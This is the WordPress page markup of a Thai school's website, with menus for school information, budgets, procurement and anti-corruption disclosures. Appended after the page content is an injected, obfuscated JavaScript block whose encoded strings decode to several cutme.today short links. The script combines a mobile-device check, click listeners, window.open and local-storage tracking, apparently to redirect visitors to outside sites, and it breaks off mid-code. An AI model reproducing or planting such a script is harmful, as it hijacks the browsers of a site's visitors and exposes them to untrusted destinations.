{\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 